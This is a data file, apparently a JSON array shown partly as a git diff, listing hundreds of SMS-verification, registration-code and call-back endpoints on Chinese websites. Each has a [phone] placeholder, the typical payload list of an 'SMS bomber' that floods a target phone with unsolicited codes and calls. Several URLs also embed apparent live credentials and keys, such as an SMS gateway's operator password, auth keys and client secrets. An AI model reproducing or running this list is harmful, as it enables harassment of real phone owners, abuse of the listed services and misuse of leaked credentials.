"http://www.longone.com.cn/servlet/user/Register?&function=AjaxGetPin1&mo=[phone]", "http://www.meisupic.com/user.php?act=ajax_validate_sms&bizcode=11&captcha=type=5&mobile=[phone]", "http://www.milvwang.com/user/isRegister/?mobile_phone=[phone]", "http://www.mzsky.cc/plugin.php?id=smstong:verifycode&idhash=SJw54jL0&formhash=82e4ff11&seccodeverify=&inajax=yes&infloat=register&handlekey=register&ajaxmenu=1&action=getregverifycode&mobile=[phone]&0.7010368446838822", "http://www.passpay.net/login/sendVerifyCode?mobile=[phone]", "http://www.patfun.com/do.php?ac=check_sms&phone=[phone]", "http://www.plaso.cn/plaso/servlet/randomCode?0.47652275536418554&type=loginrandom=[phone]", "http://www.pumg.com.cn/phone.do?USERTEL=&token=bZnQLILMeWM8EF57AsIxdhwWOYyUAzSdLGLdb%2FIcj5TxIUMmRFcqAQ%3D%3D&type=0&flag=0×tamp=1548589939708telphone=[phone]", "http://www.puyitou.com/service.html?SERVERID=770010&BIZ_CODE=REG_PHONE_CODE&PHONE_NUM=[phone]&SEND_TYPE=2", "http://www.qmango.com/users/ajax/ajax_register_code.asp?_=1487743660579&mobile=[phone]", "http://www.shdsyy.com.cn/web/index.php?classid=9191&action=call&phone=[phone]", "http://www.sk-vip.cn/index.php?m=&c=page&a=yunhu&phone=[phone]", "http://www.super8.com.cn/Ajax/HotelInterface.ashx?action=sendmsg&mobile=[phone]", "http://www.taoguba.com.cn/sendCodePC?codeType=ZCYZ+phoneNumber=[phone]", "http://www.tell520.com:80/ajax/do.html?action=sendSms&type=reg&YII_CSRF_TOKEN&phone=[phone]", "http://www.udache.com/app/mQuickReg/getSmsCode?phone=[phone]", "http://www.upshop.cn/Home/User/registerSendCode.html?mobile=[phone]", "http://www.vatti.com.cn/index.php?m=Home&c=Api&a=[phone]", "http://www.wehealthchina.net/api/v0.1/vcode?app=doctor&client=android&action=register&phone=[phone]", "http://www.wfggw.com/getcode.asp?num=[phone]&_=1480403250456", "http://www.xd.com/users/sendWebRegCode?callback=jQuery110208424835141365408_1600270044866&mobile=[phone]", "http://www.xjwvxz.com/api/call/index?user_id=244127&auth_key=c602e6ebb2311895b922d5bef854dc87&type=c&proxy_id=148455&phones=[phone]", "http://www.xlcidc.com/chkName.asp?umobie=[phone]", "http://www.xlcidc.com/chkName.asp?umobie=[phone]&lm=sendmobi&sd=0.5806221691630391", "http://www.xuebangsoft.net/eduboss/CommonAction/sendVarifyCodeToPhone.do?phoneNumber=[phone]®TimeCode=1589627585503", "http://www.xyqb.com/LKB/lg/sendSms.html?random=&loginName=[phone]", "http://www.youxia.cn/go/index.php?mod=account&code=getRandCode&pic_code=undefined&phone=[phone]", "http://www.zhichiwangluo.com/index.php?r=Login/phoneResetCode&phone=[phone]", "http://www.zjzxts.gov.cn/sendMsg.do?modelMethod=sendMessage&phonenum=[phone]", "http://www.zoneidc.com/user/sendmobi.asp?mobi=[phone]", "http://www.zuoyebang.com:80/session/pc/sendtoken?ajax&phone=[phone]", "http://www25c1.53kf.com/impl/rpc_callback_phone.php?from=api&company_id=72204003&guest_id=11199824994006&style=1&from_page=https%3A%2F%2Fwww.baidu.com%2Flink%3Furl%3D3RHZQYd7M-TF4MUvr7tQD4xVSYxHv_IWj2SbNAAdoKtf_Xk51H_avXcuoOtSQIe96CW0u5SYUWmlZJPnQXRVka%26wd%3D%26eqid%3D9f6d04a1000e3ecf000000065fb824c2&talk_page=http%3A%2F%2Fwww.yueshi-edu.com%2Fvxueli%2Fsz%2F5762.html&land_page=http%253A%252F%252Fwww.yueshi-edu.com%252Fvxueli%252Fsz%252F5762.html&call=[phone]", "http://wx.bda.com/ajax/ajax_login.php?action=[phone]", "http://wx01.lecake.com/customer/get-code.html?mobile=[phone]", "http://yueban.500zhuan.com/tools/getNum?&phone=[phone]", "http://z.7qi.me/index.php?call=[phone]&ok=", "http://zaiwai.8848.com/commonService/findMessageToken?phone=[phone]", "http://zaiwai.8848.com/commonService/sendNewVerificationCodeToPhone?phone=[phone]", "http://zhibo.zuoyebang.com/elearning/index/sendapplytoken?phone=[phone]", "http://zhuikanxs.com/novelapilogin/sendsms?phone=[phone]", "http://zntouzi.com/front/account/verifyMobileForReg?randomID=d2b07acd-917c-4d81-a849-9c694f25833b&code=111111&mobile=[phone]", "https://account.perfma.com/api/login/authentication/v1/picCaptcha?2&phoneCaptcha=[phone]", "https://androidapi4.yc.ifeng.com:443/api/fread/user/msgAuthCode?phoneNum=[phone]", "https://api-dcdn.jiayouxueba.cn/api/v3/sms/vcode?countryId=685&mobile=[phone]", "https://api.aihecong.com/account/vercode?type=register&antiBrush=ecdfddd24937106ex&callback=JSONP_1580388414994&tel=[phone]", "https://api.bat100.net/v1/authority/sms/send-sms?tel=[phone]", "https://api.dongqiudi.com/v3/useract/app/user/postGottenlCode?phone=[phone]&requestTime=1596183059901", "https://api.passport.pptv.com/snsms/sendcode?_source=ppsports&apptype=android&appversion=1.0.7.1&deviceId=7433976558071546231901338_vx768bn3ieimjk1n3g5opc7w&terminal=APP&phoneNumber=[phone]", "https://api.pkg.cn/api/sms/codeaccNbr=[phone]", "https://api.sharkshopping.com/ec/api?method=b2c.member2.related_sms&uname=[phone]", "https://api.taoelement.vip/account/sms/sms/captcha/[phone]", "https://api.taoelement.vip:443/account/sms/sms/captcha/[phone]", "https://api.wanwudezhi.com/module-user/api/v1/user/sendSmsCode?phone=[phone]", "https://apis.hyguanjia.com/user/send/phone/code?clientid=1254299999&mid=1E0D9617-438F-4A0D-BED0-AEB20FF19A50&phone=[phone]", "https://app-api.shop.ele.me/arena/invoke/?method=OpenAPIRegisterService.sendVerifyCode&site_id=gw_Cloudgame&geetest_challenge=&geetest_validate=&geetest_seccode=&reportData=number=[phone]", "https://app.api.ke.com/user/account/sendverifycodeforbindmobilev2?mobile_phone_no=[phone]", "https://app.api.lianjia.com/user/account/sendVerifyCodeForRegisterV2?mobile_phone_no=[phone]", "https://app.aplum.com/user/sendmsg?fromApp=1&phone=[phone]", "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw%3D%3D&phone=[phone]", "https://app.fangzongguan.com/fangmaster/v4.2/client/quick/user/sendCode?_token=eC1fn3C3WKrzkaIYM2EUYw==&phone=[phone]", "https://app.quyiyuan.com/APP/user/action/LoginAction.jspx?APPOINT_SOURCE=0&CHANNEL_ID=&IMEI_ID=3ECFD13A-235B-47A9-A9E1-F4DCC64D360F&PHONEOPERATINGSYS=2&PHONETYPE=iPhone8,1&PHONEVERSIONNUM=12.4.1&PHONE_NUMBER=[phone]", "https://app.webuy.ai/greatsale/user/sendAuthCode?mobile=[phone]", "https://app.zhuanzhuan.com/zz/transfer/getCaptcha?type=1&mobile=[phone]", "https://appapi.51job.com/api/user/get_verification_type.php?mobilephone=[phone]", "https://appapi.che168.com/phone/v55/user/CreateRegLoginMobileCode.ashx?_appid=2scapp.ios&_sign=bd185e04d8bdb0422467b0f95f828b49&appversion=7.7.0&channelid=App%20Store&ip=192.168.43.151&mobile=[phone]", "https://appapi.che168.com/phone/v55/user/CreateRegLoginMobileCode.ashx?_appid=2scapp.ios&_sign=bd185e04d8bdb0422467b0f95f828b49&appversion=7.7.0&channelid=AppStore&ip=192.168.43.151&mobile=[phone]", "https://appapi.moretickets.com/userapi/pub/v1_1/send_sms_for_regist?cellphone=[phone]", "https://appv2.lygou.cc/loyouser/getBindCode?appfrom=203&appver=3.2.2&identity=%2B86[phone]", "https://babyheartapi.ihealthbaby.cn/BabyheartServer/sms/sendMessage?sendType=1&smsType=1&tel=[phone]", "https://bea.sportq.com/SFitWeb/sfit/getNeceData?form.accessToken=&form.acquisitionMode=5&form.device=2e18c9d9f73c9c9f619fce23cf4039eb2748c334cb8d43c31521caee0ad92c4c&form.isBuild=0&form.mySex=&form.phoneModel=iPhone8%2C1&form.phoneNumber=[phone]", "https://bea.sportq.com/SFitWeb/sfit/getNeceData?form.accessToken=&form.acquisitionMode=5&form.device=2e18c9d9f73c9c9f619fce23cf4039eb2748c334cb8d43c31521caee0ad92c4c&form.isBuild=0&form.mySex=&form.phoneModel=iPhone8,1&form.phoneNumber=[phone]", "https://cap.caocaokeji.cn/bps/sendVerifyCode/2.0?appCode=2WZ2JRQR708W&appVersion=4.3.2&buildVersion=192&clientType=1&deviceId=5C351103-F887-4932-BC59-58C75875EFDE&fullVersion=4.3.2.192&isJailBreak=0&mobileType=ios&phone=[phone]", "https://card.10010.com/ko-order/messageCaptcha/send?phoneVal=[phone]", "https://class.hujiang.com/classtopic/handler/phonecaptcha?areaID=87051&phoneNumber=[phone]", "https://client.cangshuyuedu.com/api/Sys/SendSmsAuthCode?callback=jQuery111009421744498287961_1580993309090&pType=4&app_version=2.0.7&pkgname=com.yokong.bookfree&channel_id=1&device_id=f75c53c90f4a6635d5f6c7136120154d&mob=[phone]", "https://client.uqbike.com/sms/sendAuthCode.do?accountId=5&phone=[phone]", "https://cloud.haoyunbang.cn/user/sms/send?mobile=[phone]", "https://cloud.nucarf.com/rest/querySmsCode?phoneNum=[phone]", "https://consumer.fcbox.com/v1/account/sendCode?mobile=[phone]", "https://consumer.fcbox.com:443/v1/account/sendCode?mobile=[phone]", "https://dakaapp.troila.com/api/v7/index/send_sms?phone=[phone]", "https://dakaapp.troila.com:443/api/v7/index/send_sms?phone=[phone]", "https://ddt.zoosnet.net/lr/sendnote160711.aspx?tel=[phone]", "https://donutenglish.koolearn.com/api/message/send_vcode?callback=jQuery111009421744498287961_1580993309090&use=5&sign=1CE8E4BE7B71ABA57CBF20762AF78A0C&mobile=[phone]", "https://eapi.huolala.cn/?_m=account&_a=sms_code&args=%7B%22phone_no%22%3A%22[phone]", "https://edu.10086.cn/sso/sendSmsMsg&do=get_vcode&user_mobile=[phone]", "https://esx.3z.cc/index.php?tp=api/send_sms&device_type=iPhone%206s&uid=0&op=reg&appid=6&imei=5C351103-F887-4932-BC59-58C75875EFDE&t=1566798214&pt=2&sign=8737393a0d7dffc46883c5226d482194&ver=1.2.1&phone=[phone]", "https://esx.3z.cc/index.php?tp=api/send_sms&device_type=iPhone6s&uid=0&op=reg&appid=6&imei=5C351103-F887-4932-BC59-58C75875EFDE&t=1566798214&pt=2&sign=8737393a0d7dffc46883c5226d482194&ver=1.2.1&phone=[phone]", "https://exmail.qq.com/cgi-bin/bizmail_portal?action=send_sms&type=11&t=biz_rf_portal_mgr&ef=jsnew&resp_charset=UTF8&area=86&mobile=[phone]", "https://flights.sichuanair.com/3uair/ibe/profile/processSendSMSNew.do?ConversationID=&smsType=REGISTER&mobilePhone=[phone]&verkey=MOBILELOGIN", "https://fudao.qq.com/cgi-proxy/common_func/send_sms_code?phone=[phone]", "https://gongdu.youshu.cc/m/sign/msg?callback=jQuery111009421744498287961_1580993309090&nonce=18907&mobile=[phone]", "https://graph.3vjia.com/captcha/mobile/REG/[phone]", "https://gwbk.zhongan.com/dmapiv2/za-dm-insure/dm/user/sendSMGCode?mobilePhone=[phone]&from=web", "https://gwc.drugs360.cn/index.php?r=UserCenter/getCellphoneCode&type=4&cellphone=[phone]", "https://h5.gumipet.com/shops_sms_register?phone=[phone]", "https://happy.mail.10086.cn/jsp/cn/club/login/smscode.do?r=0.24631415040371842&usermobile=[phone]", "https://hdgateway.zto.com/auth_account_sendLoginOrRegisterSmsVerifyCode?mobile=[phone]", "https://helper.2bulu.com/sendValidateCode?p_userId=0&p_productType=0&p_terminalType=2&p_appVersion=6.1.0&mobileNumber=[phone]", "https://host.convertlab.com/sms/get?mobile=[phone]&name=Convertlab&token=4080fdef3cb44298852d226af95b2502&type=form&uuid=4a48dbfe8e1d49ab87715d2ed8e6e79d", "https://host.convertlab.com/sms/get?mobile=[phone]&name=Convertlab&token=bdfa0471b3354eba9d5a424121bdf37c&type=form&uuid=4a48dbfe8e1d49ab87715d2ed8e6e79d", "https://host.convertlab.com/sms/token?mobile=[phone]", "https://id.ifeng.com/api/simplesendmsg?comefrom=38&msgtype=0&auth=&mobile=[phone]", "https://idecoration.ikongjian.com/user/fetchCode?&deviceId=7676F5C4-1919-4FC8-9436-BBFD5BE87482&mobile=[phone]", "https://iguanyu.com/gywebsite/common/sendVerificationCode?phone=[phone]", "https://im.molinsoft.com/validate.jsp?randromid=0.2002692325464066mobileNumber=[phone]", "https://jdapi.jd100.com/uc/v1/getSMSCode?account=[phone]", "https://jdapi.jd100.com/uc/v1/getSMSCode?account=[phone]&sign_type=1&use_type=1", "https://jdapi.jd100.com:443/uc/v1/getSMSCode?account=[phone]", "https://jiameng.baidu.com/portal/com/captcha?ajax=1&device=pc[phone]", "https://ka.niwodai.com/loans-mobile/validatecode.do?method=refresh&date=1557210332912interval=60&phone=[phone]", "https://kaojiazhao.eclicks.cn/xc_v1/Enroll/create_code?driving_cert_type=1&_cityCode=023&tel=[phone]", "https://khweb.easec.com.cn:12203/nImgServlet?key=0.17275703431645484&funcNo=501520&op_source=3&flow_type=twvideo&ip=&mac=&verify_code=mobile_no=[phone]", "https://live.weaver.com.cn/homepage/createCode2?jsonpcallback=jQuery11020786823554715125_1594648708687&phonenum=[phone]", "https://login-user.kugou.com/v1/send_sms_for_reg?appid=1014&callback=GetSmsCodeCallbackFn&v=1&verifycode=&ct=1546670699&type=reg&mid=07546126fef194aa4b29a5a80ec7a8d1&kguser_jv=180925&mobile=[phone]", "https://login.10086.cn/chkNumberAction.action?userName=[phone]", "https://login.10086.cn/sendRandomCodeAction.action?userName=[phone]&type=01&channelID=12002", "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery1830021546042600087745_1584433571320&phone=[phone]", "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery183018066339418540722_1589810779142&phone=[phone]", "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery183018066339418540722_1589810779142&phone=[phone]&nation=CN&type=13&from_domain=i&verifycode=&_=1589810786512", "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery18303640777548241676_1579193274318&phone=[phone]", "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery18303956739664829656_1592495501835&phone=[phone]&type=5&nation=CN&from_domain=yjs_h5&verifycode=&_=1592495526803", "https://login.51job.com/ajax/sendphonecode.php?jsoncallback=jQuery18307610929541763114_1547125502231&nation=CN&type=5&from_domain=i&verifycode=&_=1547125703761&phone=[phone]", "https://login.koolearn.com/sso/sendVoiceRegisterMessage.do?callback=jQuery111205661385064312077_1594952633553&type=jsonp&mobile=[phone]", "https://login.koolearn.com/sso/sendVoiceRegisterMessage.do?callback=jQuery111205661385064312077_1594952633553&type=jsonp&mobile=[phone]&msgInterval=60&imageCode=&countryCode=86&country=CN&_=1594952633566", "https://love.163.com/open/api/login/phone/checkStatus?86=areaCode&phone=[phone]", "https://m.ceair.com/mobile/user/user-login!sendDistinctPwd.shtml?phoneNo=[phone]", "https://m.exmail.qq.com/cgi-bin/sell_dependent?action=send_sms&t=wap_official_mgr&ef=jsnew&type=6&area=86&mobile=[phone]&r=0.6184749692742786", "https://m.health.pingan.com/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300×tamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", "https://m.health.pingan.com:443/mapi/smsCode.json?deviceId=5a4c935cbb6ff6ca&deviceType=SM-G9300×tamp=1545122608&app=0&platform=3&app_key=PAHealth&osversion=23&info=&version=1.0.1&resolution=1440x2560&screenSize=22&netType=1&channel=m_h5&phone=[phone]", "https://m.jf.10010.com/wx006/jf-auth/wx/getCaptcha/[phone]", "https://m.ke.qq.com/cgi-bin/tool/apply_sms_code?is_ios=0&raw_phone=[phone]&phone=13058226398&national_code=86&from=1&bkn=1557826707&_=1596758267792", "https://m.ke.qq.com/cgi-bin/tool/apply_sms_code?is_ios=0&raw_phone=[phone]&phone=[phone]&national_code=86&from=1&bkn=1557826707&_=1596758267792", "https://m.lubsj.com/index.php?app=member&act=send_captcha&phone_mob=[phone]", "https://m.mgqr.com/ajax/getcode.ashx?check=0&t=1586567002298&phone=[phone]", "https://m.mgqr.com:443/ajax/getcode.ashx?check=0&t=1586567002298&phone=[phone]", "https://m.ule.com/user/getRegValidateCode?mobile=[phone]", "https://m.yiwise.com/apiPlatform/verificationCode/send?phoneNumber=[phone]", "https://masterhands.yladm.com/user/phone/verifycode?app=gaoshou_i&brand=apple&idfa=5C351103-F887-4932-BC59-58C75875EFDE&model=iphone&phone=[phone]", "https://member.chinaacc.com/api/SmsCode.shtm?jsonpCallback=success_jsonpCallback&siteId=3&mobilePhone=[phone]", "https://mktmain.daikuan.360.cn/activity/pcguide/cdsmsCode?callback=_360jr1603842207037&mobile=[phone]", "https://mobile.cmbchina.com/DUserManage/UserRegisterNew/URN_Register.aspx?phoneNo=[phone]", "https://mobile.cmbchina.com/DUserManage/UserRegisterNew/URN_Register.aspx?phoneNo=[phone]&showtopbar=true&DeviceType=E&Version=7.1.2&SystemVersion=6.0.1&behavior_entryid=lgf005001", "https://mobile.health.pingan.com/ehis-hl/ajax/sendOTP.action?smscc=ehiswxonly&phone=[phone]", "https://mobilegt.weidai.com.cn/api/v2/verify/mobile/[phone]", "https://mp.66law.cn/Common/GetValidateCode?time=1574424867777mobilePhone=[phone]", "https://mp.elong.com/mobilepromotion/common/sendactivitysmscodemtools%20?activityId=9880be64-a7c2-476e-9879-2fe371910f45&mobile=[phone]", "https://mp.elong.com/mobilepromotion/common/sendactivitysmscodemtools?activityId=9880be64-a7c2-476e-9879-2fe371910f45&mobile=[phone]", "https://msgo.10010.com/lsd-message/send/captcha/phone/v1?phoneNumber=&event=mobileloginusername=86-[phone]", "https://my.800hr.com/inc/checkcode/?width=60&high=30&size=12&tm=21m25s13&type=1&channel=2&act=getphonecode®_code=user_phone=[phone]", "https://mzone.yqb.com/mzone-http/sms/send_sms[phone]", "https://n.daoxila.com/verification/appSend?mobile=[phone]", "https://new.yohoboys.com/yohonow/api/register/registerSms?appType=2&app_version=5.9.4&area=86&client_secret=1296d0321e51188e17e698e128961947&client_type=iphone&curVersion=5.9.4°rees=%5B%5D&fromPage=iFP_Nlogin&language=zh-Hans&mobile=[phone]", "https://new.yohoboys.com/yohonow/api/register/registerSms?appType=2&app_version=5.9.4&area=86&client_secret=1296d0321e51188e17e698e128961947&client_type=iphone&curVersion=5.9.4°rees=[]&fromPage=iFP_Nlogin&language=zh-Hans&mobile=[phone]", "https://oa.dingtalk.com/omp/sms/send_check_code_img&vcode=uaiIIuNYyv&ajax=1&r=0.37962152601011057step=getverifycode&u_nme=undefined&mobi=[phone]", "https://open.shiguangkey.com/api/udb/verifycode/get/smscode?phone=86-[phone]", "https://open.taou.com/maimai/account/v5/send_reg_login_code_v3?ts=1564817141875&access_token=&appid=4&channel=AppStore&density=2&device=iPhone8,1&imei=5C351103-F887-4932-BC59-58C75875EFDE&launch_uuid=10c094ac9b334bbda6d4f2d251d0501f&mobile=+86-[phone]", "https://open.zhundao.net/api/v2/senCode?&phoneOrEmail=[phone]", "https://p.doras.api.vcinema.cn/v5.0/user/[phone]", "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&business_domain=yyy_cctalk&captchaVersion=2&hpuid=785-0bCp21yf6XXmRiz-40&imgcode=&isapp=true&mobile=%2B86-[phone]", "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&business_domain=yyy_cctalk&captchaVersion=2&hpuid=785-0bCp21yf6XXmRiz-40&imgcode=&isapp=true&mobile=+86-[phone]", "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&business_domain=yyy_cctalk&captchaVersion=2&hpuid=785-0bCp21yf6XXmRiz-40&imgcode=&isapp=true&mobile=+86-[phone]&msgtype=1&sendtype=mobilemsgpwd&token=3cab2a2b042928518869ab9fee57ce03&user_domain=cc", "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&mobile=%2B86-[phone]", "https://pass.cctalk.com/intraApi/v1/sms/send?action=SendMsg&mobile=%2B86-[phone]&imgcode=&token=aa315477956d459f40b6f26c9090b790&sendtype=mobilemsgpwd&msgtype=1&captchaVersion=2&user_domain=cc&business_domain=&hpuid=924-ECmHmDZ0xdhMnXe-43&callback=reqwest_1589532775907030687", "https://pass.hujiang.com/Handler/UCenter.json?action=SendMsg&business_domain=yyy_cichang&captchaVersion=2&hpuid=753-hG5lbwKtYM04Ldr-19&imgcode=&isapp=true&mobile=%2B86-[phone]", "https://pass.hujiang.com/Handler/UCenter.json?action=SendMsg&business_domain=yyy_cichang&captchaVersion=2&hpuid=753-hG5lbwKtYM04Ldr-19&imgcode=&isapp=true&mobile=+86-[phone]", "https://pass.hujiang.com/v2/api/v1/sms/send?action=SendMsg&mobile=[phone]", "https://passport.1yyg.com/JPData?action=send2Msg+userMobile=[phone]", "https://passport.baidu.com/v2/api/senddpass?gid=D3EF000-BEE8-4BF5-80D5-73CECBB45D8F&username=[phone]&countrycode=&bdstoken=37e69227d824b54b2d25345b07e066bc&tpl=bceplat&flag_code=0&apiver=v3&tt=1480316742232&callback=bd__cbs__o8kllk", "https://passport.bignox.com/sso/o2/sms?method=send_mobile_login_sms&mobile=[phone]", "https://passport.ceair.com/cesso/mobile!geetCheck.shtml?_0.3520412800489632&mobileNo=[phone]", "https://passport.chinagoldcoin.net/user/checkAuthCode?mobile=[phone]", "https://passport.deepoon.com/api/user/getVerifyCode?accesstoken=5381cfb341266380dd9cd812d068d031&amp;timestamp=1548161770&client=3dboboAndroid&version=6.6.4.tencent&type=1&mobile=[phone]", "https://passport.deepoon.com/api/user/getVerifyCode?accesstoken=5381cfb341266380dd9cd812d068d031×tamp=1548161770&client=3dboboAndroid&version=6.6.4.tencent&type=1&mobile=[phone]", "https://passport.eqxiu.com/eqs/sms/token?phone=[phone]", "https://passport.eqxiu.com/eqs/sms/token?phone=[phone]&type=quickLogin&checkPhone=1&channel=21&version=4.4.1", "https://passport.fanhuan.com/login/asklogincode?callback=jQuery183041957833420943325_1584502778631&mobile=[phone]", "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307125578716707999_1546707858677&_=1546707872507&mobile=[phone]", "https://passport.fanhuan.com/login/asklogincode?callback=jQuery18307700360712450502_1523359569433&mobile=[phone]", "https://passport.fanli.com/mobileapi/i/user/mobileFastReg?jsoncallback=jQuery211010311191363159777_1563973948739&mobile=[phone]", "https://passport.iqiyi.com/apis/user/check_account.action?account=[phone]", "https://passport.tianya.cn/ssl/sendSMSCode.do?countryCode=0086&mobile=[phone]", "https://passport.xueweigui.com/mobile/sendCode?mobile=[phone]", "https://passport.ziroom.com/verify/code/v2?phone=[phone]", "https://ptlogin.4399.com/ptlogin/sendPhoneLoginCode.do?phone=[phone]", "https://ptlogin.4399.com:443/ptlogin/sendPhoneLoginCode.do?phone=[phone]", "https://puser.hnzwfw.gov.cn:8081/api/user/sms?mobile=[phone]", "https://put.zoosnet.net/lr/sendnote160711.aspx?tel=[phone]", "https://register.7moor.com/Action?callback=jQuery17202579936653179218_1584495041683&action=register.rl7mWebSiteYZMWebCallTryMobileCode&data=%7B%22mobile%22%3A%22[phone]", "https://register.7moor.com/Action?callback=jQuery17202698357481160306_1589614815141&action=register.rl7mWebSiteYZMWebCallTryMobileCode&data=%7B%22mobile%22%3A%22[phone]", "https://register.7moor.com/Action?callback=jQuery17208585139394580638_1584431746146&action=register.rl7mWebSiteYZMWebCallTryMobileCode&data=%7B%22mobile%22%3A%22[phone]", "https://s-web.jtljia.com/mvc/message/vcode/user_welcome/[phone]", "https://services.qiye.163.com/service/official/sendCode?jsonpcallback=jQuery190039810459070645865_1584688891341&mobile=[phone]", "https://services.qiye.163.com/service/official/sendCode?jsonpcallback=jQuery190039810459070645865_1584688891341&mobile=[phone]&_=1584688891342", "https://sso-c.souche.com/loginApi/getCaptchaUrlByPhone.json?app=tangeche&phone=[phone]", "https://sso-c.souche.com/loginApi/getCaptchaUrlByPhone.json?app=tangeche&phone=[phone]", "https://sso.360che.com/?c=code&_0.6284588856010609&tel=code=[phone]", "https://sso.agora.io/api/verify/sms?phone=%2B86+131+5822+6398&lang=cn&country=CN&captcha=[phone]", "https://u.house.ifeng.com/getVerifyCode?_=0.38838852170651417&_t=1565612980&verifyCode=[phone]", "https://uac.10010.com/oauth2/OpSms?callback=jsonp1490030472329&req_time=1490030480322&user_id=[phone]", "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery17205960549095114636_1596719990361&req_time=1596720031540&mobile=[phone]&unicom_number=0&_=1596720031543", "https://uac.10010.com/portal/Service/SendMSG?callback=jQuery172076565523879526_1506486642542&req_time=1506486656403&mobile=[phone]", "https://uc.maodou.com/server/account/sendLoginCode?phone=[phone]", "https://user.chinahr.com/cppt/open/msg/send/smsCode?mobile=[phone]&isVisitor=isVisitor", "https://user.daojia.com/mobile/getcode?mobile=[phone]", "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=112", "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=103", "https://user.daojia.com/mobile/getcode?mobile=[phone]&newVersion=1&bu=112", "https://user.hundun.cn/get_identify_code?clientType=pcweb&versionName=&imei=&net=&phone=[phone]", "https://user.meilimei.com/taomi/user/sendSmsCaptcha?mobile=[phone]", "https://user.zhaobiao.cn/ssologin.do?method=sendLoginCodeAjax&mobile=[phone]", "https://user.zixia.com/class/CAP/codeshow.php?sid=2090&quhao=86appname=cellphonereg&action=sendcode&yzidcode=[phone]", "https://v4.passport.sohu.com/i/smcode/mobile/sblmobile?mobile=[phone]&way=1&appid=116005&callback=passport403_cb1596534389025&_=1596534591810", "https://wap.fruitday.com//v3/passport/send_vercode?mobile=[phone]", "https://wapi.jfh6688.cn/sendRegisterCode?type=1&login=[phone]", "https://webapi.account.mihayo.com/Api/create_mobile_captcha&gameId=[phone]", "https://webapi.account.mihoyo.com/Api/create_mobile_captcha?action_ticket=&action_type=regist&mobile=[phone]", "https://www.baixing.com/oz/verify/reg?mobile=[phone]&businessType=register_captcha_code", "https://www.birdnet.cn/source/plugin/login_mobile/index.php?version=4&module=[phone]", "https://www.diantoushi.com/user/v2/captcha?mobile=[phone]", "https://www.gac-toyota.com.cn/sublayouts/Member%20Center/VerifyCode.aspx?random=0.6042665278484218&ws_Method=getDynamicCodeTEL_NO=[phone]", "https://www.guiji.ai/site/sms?type=2&mobile=[phone]", "https://www.hneao.cn/gkcjzm/Sat/SendSmsCode?codetype=ZC&sjhm=17623183206&smscode=[phone]", "https://www.jdpay.com/login/register/sendActiveCode.htm?tel=[phone]", "https://www.midea.cn/next/user_assist/getverifycode?mobile=[phone]", "https://www.moretickets.com/openapi/pub/photo_codes/v1/photo_code?bizCode=MTL&verifyCodeUseType=USER_LOGIN&cellphone=[phone]", "https://www.qinglianyun.com/Home/User/sendCode?telephone=[phone]", "https://www.shencut.com/api/v1.0/code?operate_type=register&mobile=[phone]", "https://www.sogou.com/websearch/phoneAddress.jsp?phoneNumber=[phone]", "https://www.sww.com.cn/login/captcha?0.8916150596759647&sms_captcha=phone_num=[phone]", "https://www.tongquwangluo.com/api/v2/register/sendCode?mobile=[phone]", "https://www.wanmeiip.com/source/class/captcha/captcha.php?0.41730894602711244validate=[phone]", "https://www.xiaoying.com/user/apiCheckRegister?callback=jQuery19105981196630189294_1488300711819&mobile=[phone]", "https://www.xxwolo.com/ccsrv/apph5/sendShortMsg?phone=[phone]", "https://www.zhufuc.com/admin/api/center/code/verifycode?ran=0.25068726233475025&type=5&verifycode=[phone]", "https://www.zx123.cn/member/register.php?action=getcode&ajax=1&mobile=[phone]", "https://wx.zhonghebuke.com/api/zmweb/v1/user/smsLoginCode&category=signin_or_signupphone_number=[phone]"] \ No newline at end of file +[ + "http://101.132.126.166:8080/message/sendVerifyCode?callback=successCallback&mobilePhone=&t=1589625247333action_type=regist&mobile=[phone]", + "http://1314.buzz/index.php?hm=[phone]", + "http://1314.buzz:80/index.php?hm=[phone]", + "http://19.offcn.com/send_message/seccode/?0.8413693207408235&msgpic=user=[phone]", + "http://211.156.201.12:8088/youzheng//ems/security?phone=[phone]", + "http://218.57.131.146/cwbase/ep/handlers/RouteHandler.ashx?action=GetPhoneVerCode&PhoneNum=action=GetPhoneVerCode&PhoneNum=[phone]", + "http://221.179.180.158:9008/HttpQuickProcess/submitMessageAll?OperID=zjawu&OperPass=AqBTaIWp&DesMobile=[phone]", + "http://a.xcar.com.cn/bbs/dialog.php?daction=register&drequest=check&chash=ZuXty1HoAbfduG8MIMA2O53l&dhash=N7numlHsAbbf5hAGcbc&ehash=ZO%2B6mFrpB77Uv24KcMJmPpi0oTCxsaUtNQa9KWIYNzYJ3WVcKC%2B%2FCA&phone=[phone]", + "http://a.xcar.com.cn/bbs/dialog.php?daction=register&drequest=check&chash=ZuXty1HoAbfduG8MIMA2O53l&dhash=N7numlHsAbbf5hAGcbc&ehash=ZO+6mFrpB77Uv24KcMJmPpi0oTCxsaUtNQa9KWIYNzYJ3WVcKC+/CA&phone=[phone]", + "http://account.ilongyuan.com.cn/index.php?s=/home/user/verify.html&random=0.8012450194754068&client_id=&verify=[phone]", + "http://admin.bolemeng.com/index.php/api/Common/sms?callback=jQuery21102979887340557068_1582428078445&phone=[phone]", + "http://api.bangtuike.com.cn/api/v1/account/captcha?phone=[phone]", + "http://api.bangtuike.com.cn/api/v1/account/captcha?phone=[phone]&country=%2B86", + "http://api.duo17.com/sendsms.do?os_type=android&app_version=2.4.0.0&device_id=860903034476097&pnum=[phone]", + 